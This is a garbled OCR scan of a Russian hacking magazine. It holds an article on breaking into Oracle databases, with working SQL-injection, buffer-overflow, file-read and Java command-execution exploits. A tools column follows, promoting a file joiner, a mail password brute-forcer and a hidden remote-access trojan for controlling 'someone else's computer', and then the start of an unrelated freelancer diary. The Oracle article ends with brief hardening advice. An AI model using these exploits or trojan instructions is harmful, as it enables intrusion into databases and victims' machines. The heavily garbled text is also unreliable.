Зегѵісе " РБЗЕхБРгос " Ьаз 1 іпзБапсе(з) . 

ІпзБапсе " РЬЗЕхБРгос " , зБаБиз ШКШѴШ, Лаз 1 Ьапсііег (з) 
Бог Йііз зегѵісе. . . 

Зегѵісе "огсі" Лаз 1 ІпзБапсе (з) . 

ІпзБапсе "огсі", зБаБиз КЕАБУ, Лаз 1 ЛапЛІег(з) Бог БЛіз 
зегѵісе . . . 

ТЛе сошшапсі сотрІеБесі зиссеззБиІІу 

На случай если на Листенерустановлен пароль или включена опция 
Ю САЕ_ОБ_Аи і ТН Е ЫТІ САТІ О N , существует множество способов получения 
имени базы данных. 

Вотнаиболее распространенные: 

1. Поиск информации в сторонних приложениях. 

1.1. Например, СУБД Огасіе 1 0д Н2 поумолчаниюустанавливаетОгасІе 
Арріісабоп Зегѵег, который работает на порту 1 158. Этот сервер доступен 
для удаленного подключения и выдает вместе с окном ввода логина и 5Ю 
базы данных. 

1.2. При установке Огасіе в связке с системой 5АР/НЗ узнать 51 0 
базы данных можно, подключившись к приложению 5 АР ѵѵеЬ- 
тападетепД обычно висящему на порту 8001 /ТСР и отвечающему 
за управление системой 5АР. На запрос несуществующего файла, 
сервер выдает страницу ошибки, на которой содержится 51 Б базы 
данных. 

2. Имя базы данных является стандартным, словарным или частично/пол- 
ностью совпадаете ОЫЗ/МЕТВІОЗ-именем хоста, например О ПС Б. 

3. Имя базы данных состоит из малого количества символов. Например, все 
четырехсимвольные имена перебираются в течение двух часов. 

4. Имя базы данных можноузнать по ссылке из другой базы данных, из 
файла іпвпатев.ога на взломанном хосте, атакже, например, прослушивая 
сетевой трафик. 



ХАКЕР 01 /109/ 08 



► 073 




Для перебора можно воспользоваться программой 5Ю81ІЕ55. Как видно, 
способов выяснения 5Ю’а базы данных без доступа к Л истенеру доста- 
точно. В своей практике в 90% случаев тем или иным способом 5Ю базы 
данныхя добывал. 

Получив 5Ю базы данных, мы можем пытаться подобрать пароли учетных 
записей пользователей. СУБД Огасіе при установке создает множество 
системных учетных записей со стандартными паролями, и обычно адми- 
нистраторы забывают отключать или хотя бы менять пароли. К примеру, 
при установке СУБД Огасіе 9 П2 инсталлятор просит ввести новые пароли 
для учетных записей 5У5 и 5У5ТЕМ, но пароли учетных записей БВБЫМР и 
5С0ТТ остаются стандартными. Кроме приведенных выше логинов множе- 
ство приложений, интегрируемых с Огасіе, используетсвои стандартные 
системные учетные записи. Список стандартных аккаунтов насчитывает 
порядка 600 имен и доступен в интернете. Для проверки СУБД на наличие 
логинов с паролями, установленными поумолчанию, атакже для подбора 
паролей можно воспользоваться утилитой озсаппег [ ѵѵѵѵѵѵ.сдиге.пеіЛооІБ/ 
озсаппег Ып 1 0 б.гір ). 

Е : \Соо1з\озсаппег_Ьіп>озсаппег -з 192.168.30.13 

Есть несколько моментов, благодаря которым перебор паролей в СУБД 
Огасіе приноситуспех: 

1. Многие системные имена пользователей известны, что позволяет подби- 
рать только пароли. 

2 . Поумолчанию ограничений надлину и сложность пароля неустановлено. 

3. Перебор паролей к учетным записям не блокируется. 

4 . Базы данных обычно содержат много учетных записей, а нам достаточно 
подобрать хотя бы одну (не обязательно административную). 

В моей практике в 90% случаев перебор паролей к СУБД Огасіе завершался 
успехом и на это требовалось не более 10-15 минут. 

Н ЛОМАЕМ ОРАСЬЕ ИЗНУТРИ 

В отличие от операционных систем, где процесс обновления уже не вызы- 
ваеттрудностей и осуществляется почти в автоматическом режиме, с СУБД 
Огасіе дела обстоят намного хуже. Во-первых, обновления выходяточень 
редко; во-вторых, до сих пор ихустановка нетривиальна и часто может 
грозить серьезными сбоями втех случаях, когда Огасіе используется в со- 
вокупности с какой-либо сторонней системой. Учитывая, что большинство 
уязвимостей имеетлокальный характер, многие администраторы зачастую 




не уд ел я ют это му должно го внимания, а зря. Как мы выяснили, получение 
локального доступа для злоумышленника не составляет особой проблемы. 
Ежеквартально компания Огасіе выпускает обновления, закрывающие в 
среднем около 50уязвимостей в их продуктах, но большая часть уязвимо- 
стей так и остается незакрытой. Основные атаки, совершаемые пользова- 
телем против СУБД Огасіе, направлены на повышение своих привилегий. 
Реализовавте или иныеуязвимости во встроенных функциях СУБД, 
злоумышленник может произвести следующие действия: 

1. Повысить привилегии до роли ОБА. 

2 . Произвести атаку на отказ в обслуживании или выполнить произвольный 
код в системе. 

3. Прочитать хэш и паролей пользователей и попытаться в дальнейшем их 
расшифровать. 

4 . Сменить пароли кучетным записям пользователей, втом числе и 
администраторов. 

Рассмотрим перечисленные варианты более подробно. 

Н 50І.-ШЕСТІ0Ы 

Обычно для повышения привилегий используютуязвимости класса 50І_- 
іщесбоп во встроенных процедурах СУБД Огасіе. Это самый распростра- 
ненныйтип уязвимостей в СУБД Огасіе и втоже время самый опасный, так 
как количествоуязвимостей такого типа насчитывает несколько сотен и 
часть из нихдо сих пор неустранена. 

Поскольку многие из этих процедур выполняются от имени их владельца, 
которым является пользователь 5У5, то, внедрив свой код, мы сможем выпол- 
нять произвольные действия от имени системного пользователя. Ситуация 
аналогична ІІпіх-системам, в которых, найдя уязвимость в БІІЮ-программе и 
реализовав ее, мы можем повыситьсвои привилегии в системе. Для примера 
запустим один из последнихэксплойтов, повышающий наши привилегии 
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Чтение файлов через ®ТІ__РІІ_Е 




Список паролей по умолча- 
нию: щ . реІеТі ппі гап . сот/ 
сіеТаиІІі/сІе'ГаиІ 1:_р а55ѵѵогсІ_ 
іібіЛЩп . 

Рекомендую ознакомиться :). 




> Ипкз 



• Список стандарт- 
ных 51 0 опубликован 
в открытом доступе: 
ѵѵѵѵѵѵ.гесІ-сІаіаЬазе- 
зесигііу.сот/всгірів/ 
зісі.Ш . 

• Подбор 5 1 Р : ѵѵѵѵѵѵ. 

гесІ-сіаѣаЬазе-Д Е 

весигііѵ.сот/ 

зо^ѵѵаге/зібдцезз.гір. 

• Последние 

ЭКСПЛОЙТЫ: 

ИМрУ/тіІѵѵОгпп.сот . 



до роли РВА. Он написан на РБ/5СІЕ, и для старта необходимо 
подключиться к СУБД пользователем 5С ОТТ и запустить его. 

СКЕАТЕ ОВ КЕРБАСЕ ЕШСТІОБ НАСКІТ КЕТШЩ 
ШМВЕК 

АБТНІБ СБККЕБТ_Б8ЕК А8 
РКАСМА АБТОБОМОБ 8_ТКАБ 8 АСТ I (Ж ; 

ВЕСІЫ 

ЕХЕСБТЕ ІММЕБІАТЕ ’ СКАБТ БВА ТО ЗСОТТ * ; 
СОММІТ ; 

КЕТБКБ ( 0 ) ; 

ЕББ; 

/ 

ехес ЗУ8 . ЬТ . ЕІББКІСЗЕТ ( 1 . 1 1 I I ЗСОТТ. 

НАСКІТ ( ) | | 1 1 1 1 ) -- 1 , ’х 1 ) ; 

Сначала создается процедура, которая будет работать от 
имени того, кто ее запустил (в нашем случае это пользователь 
5У5). Далее выполняется уязвимая функция, в которую встав- 
лен вызов нашей процедуры. В ходе выполнения функции от 
имени 5У5 сработает наша процедура, и пользовательЗСОТТ 
получит роль РВА. 

Н АТАКИ НА ПЕРЕПОЛНЕНИЕ БУФЕРА 

Здесь в принципе все ясно: обычные переполнения встроен- 
ных функций с возможностью выполнения Во5-атаки или в 
некоторых случаях произвольного кода. Существует множес- 
тво встроенных процедур, параметры которыхуязвимы для 
атаки на переполнение буфера. В качестве примера рассмот- 
рим эксплойт, вызывающий переполнение буфера в функции 
Х0В.0ВМ5_ХМІ_5СНЕМА.6ЕМЕРАТЕ5СНЕМА, работающий 
для версии СУБД Огасіе 10 Р1 под управлением ѴѴІпсІоѵѵз. Он 
добавляет в систему пользователя баск. Таким же образом 
можно создавать произвольные файлы в системе. 

ЗЕЬЕСТ ХБВ . БВМЗ_ХМЬ8СНЕМА . СЕБЕКАТЕЗСНЕМА 
( 1 а 1 , 1 ААААААААААААААААААААААААААААААААААААА 
АВВВВВВВВВВССССССССССАВСБЕ 1 | | сЬг(212) I |сЪг(1 
00) I I сЪ.г (201) I |сЪг(01) I I сЪ.г ( 141 ) | |сЬг(68) I I 



сЬг(Зб) I | сЪ.г ( 18 ) I | сЬг ( 80 ) I |сЪг(255) I |сЬг(21) 

I |сЪг(192) I |сЬг(14б) I |сЬг(49) I |сАг(02) | | 
сЬг(255) I |сЪг(21) I |сАг(15б) I |скг(217) | | сЬ 
г ( 49 ) I I сЪг (2)|| сЪг ( 32 ) | | 1 пек изег каск к@ск 
/ асЗ-СЗ. 1 ) ЕКОМ ББАБ; 

Н ОН РАТСНІЫО 

Подобная уязвимость была устранена в январе 2006 года, но 
тем не менее встречается очень часто. Уязвимость существует 
в процессе обработки подключения клиента к СУБД. После 
успешного подключения клиентская программа посылает 
командуАБТЕР 5Е55І0ІЧ 5ЕТ, выполняемую от имени пользо- 
вателя 5У5. Следовательно, нам достаточно изменить в коде 
клиента команду АБТЕР 5Е55І0Ы, например, на 6РАЫТ БВА 
(путем модификации сИІ-библиотеки, которая отвечаетза под- 
ключение). В результате при подключении непривилегиро- 
ванным пользователем мы автоматически получаем роль БВА. 

Н ЕѴІІ.ѴІЕѴѴ5 

Еще одна атака заключается в создании представлений 
(ѴІЕѴѴ), с помощью которых возможно изменение/добавление/ 
удаление данных при отсутствии привилегий на эти действия. 
Для примера рассмотрим вариант, когда у нас имеется табли- 
ца ТЕ5Т с правами на изменение данных. 

8<2Ь> зеіеск * кгош ТЕЗТ; 

ІБ БАМЕ ШМВЕК 

1 БЗЕКІ 1000 

30Ь> ирсіаке ТЕЗТ зек ШМВЕК=0; 

ЕККОК ак Ііпе 1 : 

ОКА-01031: іпзиккісіепк ргіѵііедез; 

Теперь создадим представление (ѴІЕѴѴ), содержащее данные 
из нашей таблицы, и изменим в нем данные. Как мы видим, в 
результате в исходной таблице данныетакже изменились. 

8<2Ь> сгеаке ѵі еѵі ЕѴІБѴІЕБ аз зеіеск а.* кгош 
(зеіеск * кгош ТЕЗТ) а іппег зоіп 







> ІП^О 

Поумолчанию СУБД 
Огасіе в ѴѴІпбоѵѵв за- 
пускается с правами 
администратора. 



/»ѵ 







> ѵѵагпіпд 

Внимание! Взлом 
чужих баз карается 
статьей 272 УК РФ! 

Не вздумай нару- 
шать закон. И помни, 
что ни редакция, ни 
автор за твои дейст- 
вия ответственности 
не несут. 
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^ ВЗЛОМ 



(зеІесД * Тгот ТЕЗТ) Ь оп (а. ісі=Ъ. ісЗ. ) 

30Ь> ирсІаВе ЕѴІЬѴІЕМ зеЕ ТЕЗТ=666; 

1 г ом ирсІаЕесІ. 

3<2Ь> зеІесЕ * Егот ТЕЗТ; 

ІБ БАМЕ ШМВЕК 

1 БЗЕЕ1 666 

Аналогичные действия можно совершить с системными таблицам и типа 
5У5.БІ5ЕР$. 

В ПОЛУЧЕНИЕ ДОСТУПА К ОПЕРАЦИОННОЙ СИСТЕМЕ 

Итак, мы выяснили, как получить административный доступ к СУБД Огасіе, 
но это не предел. С правами администратора злоумышленник (при наличии 
определенных настроек в конфигурации СУБД) может получить доступ к 
самой операционной системе при помощи встроенных функций. А написав 
собственные РС/БОЕ-процедуры — совершать различные действия в сис- 
темес правами пользователя, отимени которого запущена СУБД (в ѴѴІпбоѵѵз 
Огасіе поумолчанию запускается с правами администратора). 

Н ЧТЕНИЕ/ЗАПИСЬ ФАЙЛОВ ЧЕРЕЗ ПРОЦЕДУРЫ ІЛІ..РІІ.Е 

Этот способ является самым распространенным и ктомуже в некоторых 
случаяхтребуетминимальных привилегий. Поумолчаниюу пакета БІТБ_ 
РІБЕ имеется доступ ко всем файлам, таккаку него неустановлена рабочая 
директория. Но бывает, что СУБД сконфигурирована таким образом, что 
значение БІТБ_ЕІБЕ установлено в«*». Это означает, чтолюбой пользова- 
тель может получить доступ на чтение и запись к произвольным файлам на 
сервере. В случае если значение БІТБ_ЕІБЕ неустановлено, для доступа 
кфайловой системе необходимо совершить ряд действий, для которых 



требуются права СРЕАТЕ 01РЕСТ0РУ. Они обычно естьу пользователя БВА. 
Сначала создается директория, которая указывает на реальную директорию 
на сервере при помощи команды СРЕАТЕ О Р РЕРБАСЕ 01РЕСТ0РУ. А потом 
запускается одна из процедур из пакета БІТБ_ЕІБЕ, например БІТБ_ЕІБЕ. 
Іореп. 

сгеаВе ог геріасе сІігесЕогу риЫіс_ассезз аз 'С:/'; 

ЗЕТ ЗЕКѴЕКОІІТРІІТ ОБ 
сіесіаге 

Т иШ_Ті1е . Ті1е_Оуре; 
зВиЕЕег ѴагсЬаг ( 80 00 ) ; 

Ьедіп 

Е : =ІЛЪ_ЕІЬЕ . ЕОРЕБ ( ' РБВЫС_АССЕЗЗ ' , 1 ЪооЕ . Іпі ' , ' г ' ) ; 
Іоор 

ІІТЬ_і’ІЬЕ . ОЕТ_ЫЫЕ ( Е , зВиЕЕег ) ; 

БВМЗ_ОІІТРІІТ . РІІТ_ЫЫЕ ( зВиЕЕег ) ; 
епсі Іоор; 

ЕХСЕРТІСЖ 

ѵЕЬеп по_с1аЕа_Еоипс1 Ызеп 
ІЛЪ_ЕІЬЕ . ЕСЬОЗЕ ( Е ) ; 
епсі; 

/ 

Н ПОЛУЧЕНИЕ ШЕЛЛА ЧЕРЕЗ МѴА-ПРОЦЕДУРЫ 

В Огасіе мы можем писать встроенные процедуры на Оаѵа. Реально сделать 
функцию, осуществляющую доступ кфайловой системе и командной 
строке, а затем выполнять произвольные системные команды. Для запуска 
процедуры необходимо иметь привилегии ОВАили права на выполнение 
процедур из пакета 5У5:іаѵа. Существует множество вариантов реализа- 
ции этой программы, но все они в конечном счете используют Заѵа-метод 
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> ѵісіео 

На дискеты найдешь 
видео, где наглядно 
показан процесс 
взлома и защиты 
Огасіе. 




> СІѴСІ 



На нашем диске ищи 
подборку софта, опи- 
санную в статье, а 
та кже до ку м е нта ци ю 
по защите Огасіе. 



Подмена Іод-файла 



Пипііте.деіПипІіте().ехес(). Код процедуры полностью выложен на 0Ѵ0. 
Здесь публикуется лишь основной фрагмент: 

сгеаСе ог геріасе апсі гезоіѵе ^аѵа зошгсе пашей 
" огаехес" аз 
ішрогС з аѵа . Іапд . * ; 
ішрогС з аѵа . іо . * ; 
риЫіс сіазз огаехес 
{ 

/* 

* Сошшапй ехесиСіоп шойиіе 
*/ 

риЫіс зСаСіс ѵоій ехесСошшапй (ЗСгіпд сошшапй) 
Ытгоѵ^з ІОЕхсерСіоп 

{ 

КипСіше . деСКипСіше ( ) . ехес (согшпапй) ; 

} 

Для выполнения команд пишется небольшой РЕ/БОБ-код. В данном слу- 
чае вызывается команда веі, но мы можем поменять ее, скажем, на пеі ивег 
еѵіІ/асИ, тем самым получив пользователя еѵіі на сервере. 

ЗЕТ ЗЕКѴЕКОІІТРиТ ОЫЗІ2Е 1000000 
САЬЬ БВМЗ_ЦАѴА . 5ЕТ_ОІІТРІІТ (1000000); 

ВЕОШ 

огаехес . ехесСоштапй ( ' зеС 1 ) ; 

ЕЫБ; 

/ 

Единственным минусом этого способа является тот факт, что поддержка 
Оаѵа может быть отключена или вообще неустановлена. Но, по статистике, 
примерно в 60% случаев прием работает. 

Н ДРУГИЕ СПОСОБЫ ПОЛУЧЕНИЯ ДОСТУПА К ОС 

Существует еще несколько способов получения доступа к файло- 
вой системе на случай, когда поддержка Оаѵа-процедур не уста- 
новлена, а доступ к ІІТЕ_РІЕЕ в целях безопасности тем или иным 
образом закрыт. Они все принципиально похожи на иТЕ_РИЕ и 



требуют сперва создать директорию при помощи команды СРЕАТЕ 
ОР РЕРЕАСЕ й I Р Е СТО РУ. 

1. 0ВМ5_І_0В. Существует пакет 0ВМ5_І_0В, который функционально 
похож на ІІТІ__ЕІІ_Е, но менее распространен. Для получения доступа к 
файловой системе необходимо вызвать процедуру 0ВМ5_І_0В. ОРЕМ с 
соответствующими параметрами. 

2 . 0ВМ5_АВѴІ50Р. В СУБД Огасіе 1 0д есть пакет 0ВМ5__АВѴІ50Р, с 
помощью которого также можно получить доступ к файловой системе 
посредством процедуры бЬт5_асІѵІ50г.сгеа1:е_і : іІе с соответствующими 
параметрами. 

3. Также существует множество похожих функций. В одних случаях 
злоумышленник получит доступ на чтение/запись файлов, в других 
— полноценный доступ к командной строке с правами пользователя, 
от которого запущен Огасіе, с дальнейшей возможностью повышения 
привилегий. 

Н ЗАЩИЩАЕМ ОРАСЬЕ 

Учитывая все вышесказанное, можно подвести вполне ожидаемый итог: 
базы данных представляют реальную угрозу безопасности компании. 

В заключение хотелось бы привести некоторые основные рекомендации 
по повышению уровня защищенности Огасіе: 

1. Установи пароль на доступ ксервисуТЫЗ Ызіепег. 

2 . Включи протоколирование подключения кЛистенерудля обнаружения 
попыток перебора паролей. 

3. Не используй словарные, легко угадываемые 5Ю-имена. 

4 . Ограничь доступ ксистемам, через которые можно узнать 5Ю. 

5 . Проведи аудит используемыхучетныхзаписей: удали или отключи 
неиспользуемые и смени стандартные пароли системных учетныхзаписей. 

6. Внедри корпоративную парольную политику в СУБД. 

7 . Установи последние критические обновления или хотя бы ограничь 
доступ пользователям на запуск потенциально опасных процедур. 

8. Проанализируй привилегии и роли пользователей, руководствуясь 
принципом наименьших привилегий. 

9. Если возможно, отключи возможности доступа пользователей Огасіе к 
файловой системе. 

Эти действия помогут наиболее полно защитить СУБД без использования 
дополнительных программно-аппаратных средств, позволяющих избе- 
жать неожиданныххакерских нападений, ц-ц 
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ЛЕОНИД «ВОЮ» СТРОЙКОВІ 

! ПОЮВкТц/И 
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Программы для хакеров 



ПРОГРАММА: МІСКОООІІЧЕК 
ОС: У№ 0 У 5 200 О/ХР /2003 
АВТОР: С 0 ЕАЫ 2 К 



Г *■!■ «! гк 7 и I . ЖШіЛ 7 > 




Склеиваем файло 



Помнится, нетакдавно на страницахХ-ІооІз я 
выкладывал один из популярных джойнеров. 
Проблема заключалась лишь втом, что эта утила 
достаточно популярная, а следовательно, ее 
использование связано с некоторыми ограниче- 
ниями. Сейчас я хочу представить тебе очеред- 
ной приватный экземпляр для склейки несколь- 
ких файлов — М ісгоЛоіпег [ ѵѵѵѵѵѵ.ѵѵіевепиаІЬаИп. 
сІе/ЬіІсІбоІде/М ісгоЛоіпег.гаг ] . Тулза весит всего 
около 1 5 Кб и замечательно чувствует себя на 
флешке :). Втекущей версии (ѵі .7 МІ) можно 
выделить следующие функциональные особен- 
ности: 



— склеивает до 4096 файлов любого 
типа (картинки, иконки, приложения 
и т . п . ) ; 

— для полученного файла можно ус- 
тановить иконку из * . ісо , * . ехе или 
* . 611 ; 

— файлы шифруются; 

— файлы можно запаковать внутрен- 
ним паковщиком (опционально, паку- 
ет лучше, чем гір и ирх) ; 

— минимальный размер загрузчика 

— 2048 байт; 

— полученный файл можно запаковать 
любым ехе-паковщиком (ЮРХ, АЗРаск, 

— индивидуальные настройки для каж- 
дого файла: видимость, откуда за- 
пускать, параметры командной стро- 
ки, атрибуты, автозапуск и т.д. ; 

— возможность регистрации БОТ- и 



ОСХ-файлов при использовании ѴВ- 
приложений ; 

— опция Меібіпд, которая позволяет 
после запуска полученного файла его 
стирать /подменять ; 

— работает под 95/98/2к/ХР/2кЗ ; 

— интерфейс на русском языке (СОТ) . 



Использовать джойнер по назначению (я никоим 
образом не имею в виду назначение, противоре- 
чащее законодательству) не составит труда. При 
клике на баттоне «Склеить» результат а втом эти- 
чески сохраняется в файле ЗоіпесІ.ехе, который 
находится в каталоге с самой программой. Если 
включить опцию «Паковать», то джойнер сначала 
запакуетуказанные файлы, а затем склеит их в 
единое целое :). Крометого, МісгоЗоіпег позво- 
ляет модифицировать результирующий файл 
ДоіпесІ.ехе), послетого каксклеенные файлы 
были запущены: 



— самоудаление результирующего фай- 
ла ( йоіпеб. ехе) ; 

— замена результирующего файла одним 
из склеенных. 



Какты понимаешь, особенно интересен второй 
способ, с помощью которого можно незаметно 
удалить прикрепленную программу после ее 
запуска. 

ПРОГРАММА: ІІЧЕТСКАСК 
ОС: У ІІЧ 0 ОУЗ 2000 /ХР 
АВТОР: АІ_С 0 І_ 




Правим НТТР-пакеты вручную 



Я уже не раз затрагивал тему поиска новых 
уязвимостей в веб-приложениях (полистай 
подшивку известного журнала). Вопрос дей- 



ствительно является наболевшим. Не стоит 
и говорить, что од ним внешним анализом 
движка ресурса зачастую не обойтись. В такой 
ситуации сложно представить свое существо- 
вание без надежного и мощного НТТР-дебаг- 
гера. Один из таких функциональных инстру- 
ментов — ІпеЮгаск. Утила небезызвестная, 
но разобраться сходу в ней не так-то легко :). 
Какты уже понял, тулза предназначена для 
отправки НТТР-пакетов на сервер и получения 
от него ответа. 

Исходный НТТР-пакетзадается в текстовом 
виде. Ответ сервера принимается в анало- 
гичном формате, что позволяет покопаться 
ручками в НТМІ_- и 45-коде :). Прога дает 
возможность вводить произвол ьные значения 
практически всех параметров запроса. Сущес- 
твует поддержка двух методов: 6ЕТ и Р05Т. 
Причем Р05Т поддерживает любые МІМЕ-фор- 
маты передаваемых данных. 

Дебаггер позволяет указывать/модифициро- 
вать следующие параметры запроса: 



шь 

КеТегег 

Нозб 

Сопбепб-Туре 

Ассерб-Епсобіпд 

ОТег-Адепб 

Соокіе 

АиЫтогігабіоп 

Х-Рогмагбеб-Рогпетл 

Ѵіапем 

Саске-Сопбгоіпе™ 



ІпеЮгаск включает в себя кодер/декодер для 
корректного кодирования и расшифровки дан- 
ных в ІІРЕ-формате. Ктулзе прилагается утила 
Маѵівсоре, без которой полное функциониро- 
вание НТТР-дебаггера невозможно. Маѵівсоре 
позволяет перехватывать текст НТТР-паке- 
тов, идущих к серверу и обратно. Достаточно 
лишь воспользоваться меню (в частности, 
вкладкой ѴѴеЬ-ТооІв) и настроить программу 
под себя. Использовать обе тулзы рекоменду- 
ется в связке (ІпеЮгаск + Маѵівсоре). После 
детальной корректировки всех параметров 
можно смело запускать твой любимый браузер 
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(Ыаѵівсоре работает нетолько с Осликом). Вбив 
интересующий ІІРЕ в адресную строку и нажав 
<Епіег>, ты увидишь, как Маѵівсоре перехва- 
тывает полученные от сервера НТТР-пакеты. 

Но наибольший интерес для нас представ- 
ляет конструкция исходящих запросов. Так, 
например, не составляеттруда скопировать 
из Маѵівсоре исходящий НТТР-пакет, затем 
отредактировать его в ІпеіСгаск (проверим 
атакуемый движок на наличие 50І_-инъектов 
через куки :)) и отправить по назначению. 
Результат можно будет наблюдать непосредст- 
венно в НТТР-дебаггере, благо он оснащен еще 
и собственным веб-браузером. Одним словом, 
если ты готов изрядно помучиться с отладкой 
НТТР-пакетов, ІпеЮгаск тебе в помощь! 

ПРОГРАММА: ІЧЕХТМАП.КІІ ВКІЛЕГОКСЕ 
ОС: УІІЧ0ОУ5 2000/ХР 




Учимся «вспоминать» пароли :) 



Иногда случается так, что нам нужно сбру... 
тьфу, «вспомнить» забытый пароль от мыль- 
ника. «Вспоминать» можно с помощью разных 
методов: начиная от паяльника в известном 
месте (ректального криптоанализа. — Прим. 
РогЬ’а) и заканчивая всевозможным специа- 
лизированным ПО :). Инструкцию по примене- 
нию паяльника я приводить не буду, поскольку 
там все просто и очевидно. А вот на софте 
мы остановимся подробнее. Какты знаешь, 
универсальных переборщиков крайне мало, 
поэтому многие утилы пишутся целенаправлен- 
но под конкретный таіі-сервис. В Х-Іооів я уже 
рассказывал, каким образом можно вспомнить 
пасс к ящику на таіі.ги . теперь пришел черед 
других почтовиков :). Обрати вниманиенэ тулзу 
под названием пехіплаіі.ги Ьгиіеіюгсе. Что в ней 
примечательного? Да в первую очередь список 
доменов, которые она поддерживает: 



пехбтаіі . ги 
пхб . ги 
етаіі . зи 
гиззіап. ги 
хакег . ги 
збисіепбз . ги 
таі12к . ги 
сіегідпег . ги 
ргодгатізб . ги 



Что, ты уже побежал чекать свой пасс в домене 
хакег.ги? :) Не спеши, давай сначала разбе- 
ремся в софтинке, а потом будем пытаться 
«вспоминать». Ути л а обладает симпатичным 
ОІЛ’шным интерфейсом, что позволяет сделать 
наши «воспоминания» еще более приятными 
:). На передней панельке располагается четыре 



баттона: Біагі, 5*ор, Орііопв и АЬоиІ. С первыми 
двумя все предельно ясно — старт брута/его 
окончание. Третья кнопка открывает дополни- 
тельное меню, где можно указать название и 
путь до файлов с мыл ьн и ка ми, а также до лог- 
файла. Дефолтное количество потоков — 1 0, но 
жадничать я тебе не советую, так как качество 
брута от этого врядли сильно улучшится. На 
этой же вкладке есть кнопка Аіковаѵе (по 
умолчанию 5 секунд). Зачем она нужна и какие 
значения вбивать в формочку рядом с ней, 
полагаю, объяснять не нужно :). После указания 
всех необходимых параметров смело жми 
Біагі и наслаждайся логом в основном окошке 
брутера. Как показывает практика, юзать 
подобные утилы лучше с дед и ков, причем с 
забугорных и желательно ломаных (тсс, я тебе 
этого не говорил :)).Темнеменее учти, что лю- 
бые противоправные действия ствоей стороны 
будут караться законом. Поэтому «вспоминай» 
исключительно свои пароли :). 

ПРОГРАММА: ЗНАКК 
0С:Ѵ№0Ѵ32000/ХР 




Нередко у многих из нас возникает необходи- 
мость порулить чужим компом/сервером. Не 
знаю, как у тебя, а у меня она возникает каждый 
день :). Естественно, для удобного и спокойного 
управления чужим аппаратом нужен надежный 
инструмент. Причем РАбтіп способен выручить 
далеко не всегда. А потому представляю твоему 
вниманию очередную систему удаленного 
администрирования. Кто и что будет«адми- 
нистрировать» и в каких целях — отдельный 
разговор, поэтому сперва рассмотрим основные 
характеристики софтины: 



— полное управление процессами в 
чужой системе; 

— возможность создания скриншотов; 

— браузинг винчестера «инфицирован- 
ной» системы . 



Как видишь, система вполне функциональна. 
Конфигурирование серверной части не займет 
много времени, нужно л ишь задать несколько 
обязательных параметров. 

Бегѵегпате- Ивавв — здесь следует вписать 
название бота, неплохо подойдет что-нибудь 
из стандартных виндовых процессов (на- 
пример, вѵсбові :)). Далее будет предложено 
указать диру, в которую отправится серверная 



часть системы. Тут можно указать путь до 
любого из системных каталогов (только необ- 
ходимо учитывать, что у проги должно хватить 
прав на запись в него). Бегѵег РаввѵѵогсІ — па- 
роль подключения к серверной части бота. 
Соппесііоп Іпіегѵаі — временной интервал 
между коннектами. АНегпаІіѵ Іпвіаіі — здесь 
можно указать сообщение, которое будет 
показано жертве после запуска бота. Советую 
оставить пустым :). БіеаНЬ — меняем Бегѵег 
Туре на Нісісіеп Бегѵег и радуемся. Биттагу 
— сведения о созданном боте (опятьже опция 
рассчитана исключительно на шутников :)). 
Затем ско мп ил им наше детище с расширением 
ехе, предварительно поставив галочку напротив 
Раск БегѵегѵѵііЬ ЦРХ. Все — серверная часть 
нашей системы готова. При желании ты можешь 
склеить полученного бота с каким-нибудь ПО 
и наслаждаться результатом. В любом случае 
ответственность за свои действия ты понесешь 
сам :). 

ПРОГРАММА: Р0КТ9САІЧ 
ОС:*МІХ/УІІЧ00УЗ 
АВТОР: 0АМЕЗ І_ООРЕ 




Сканер как на ладони 



Иногда бывает нужно срочно п рос ка нить пор- 
ты на атакуемом сервере в локальной сети. На 
первый взгляд, тривиальная задача. Но что де- 
лать, если запуск сторонних ехе- приложений 
запрещен? В подобной ситуации я оказался в 
своем универе (действовал я исключительно 
из благих побуждений :)). Спустя некоторое 
время я нашел выход — скриптовый сканер 
портов. Ктакому решению меня подтолкнул 
найденный в системе Регі-интерпретатор. 

Надо сказать, что сперва я набросал свой, 
примитивный сканер, но потом мне подвернул- 
ся болееудобный — Рогівсап. Работа скрипта 
предельно проста, при запуске требуется лишь 
указать хост либо список сканируемых хостов, 
после чего можно смело жать <Епіег>. Функ- 
циональная часть прозрачна и незатейлива, 
об этом свидетельствует кратко и аккуратно 
написанный сорец, кусок которого представ- 
лен ниже: 



богеасЪ. $рогб (©рогбз) { 

$зоск = ІО: : Зоскеб : :ШЕТ-> 
пеѵі ( " $реег : $рогб " ) ; 

ргіпб " \пРогб $рогб 
$соппесбес1{ $рогб} ореп\п" іб 
( $зоск) ; 

} 



В общем, для полноценного сканирования 
Рогівсап использовать проблемно, а вот при 
форс-мажорных обстоятельствах это лучший 
выбор, уж поверь мне 
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ДНЕВНИК 

ФРИЛАНСЕРА 




В ПЛЕНУ СВОБОДЫ 



К черту всю эту офисную работу! Как же мне надоели эти скучные серые будни! Это на- 



чальство, которому как будто на все наплевать, этот никому ненужный график в стиле 



«от звонка до звонка». Я хочу сво-бо-ды! Хочу вставать, когда захочу, хочу заниматься тем, 



чем хочу, да и вообще, у меня очень много разных «хочу», которые, «работая на дядю», я в 



жизни не реализую. Все — завтра сдаю последний макет и с головой бросаюсь в свобод- 



ное плавание. А почему бы и нет? Переезд в крупный город из провинции не проблема. 



Заказчики? Тем более что я собираюсь увести пару человек из фирмы. Так что можно 



сказать, путь на удаленную работу мне заказан. Завтра же объявлю шефу о своем уходе, 



перетру в блогах о том, кто сможет приютить меня на время, и, собственно, я готов буду 



сорваться к мечте, имя которой — фриланс и свобода! 




ЗАПИСЬ ПЕРВАЯ 



Настроение 



Песня ДНЯ: 



супер 
«Все будет офигенно» 
большой 



Господи, наконец-то я выспался. Впервые за последние несколько лет я 
встал с мыслью, что теперь все в моих руках, и вот он — вкус настоящей 
свободы. На кредитке была небольшая сумма, так что волноваться было 
не о чем. Первым делом мне хотелось сделать дома некоторую переста- 
новку. Насмотревшись на Хабре фоток офисов компаний уровня Ѳоодіе, 
я пришел в истерический восторг. В голове один за другим вспыхивали 
наполеоновские планы (нет, не добраться до Москвы и там замерзнуть). 
Решено — делаю из своей комнаты современный креативный офис. 
Много денег не надо, формула «мусор + фантазия = креатив» сделает 
свое дело. 

Таким образом, потратив весь день на легкое преображение свое- 



го «бизнес-центра», вечером я занялся регистрацией на основных 
биржах удаленной работы и заливом туда своего портфолио. Решив, 
что для полного счастья этого будет мало, я докупил к своим аккаунтам 
платные услуги и стал одним из прототипов героини фильма «В ожи- 
дании чуда», искренне надеясь, что, когда я проснусь утром, обнаружу 
туеву кучу перспективных и дорогих проектов и вообще меня завалят 
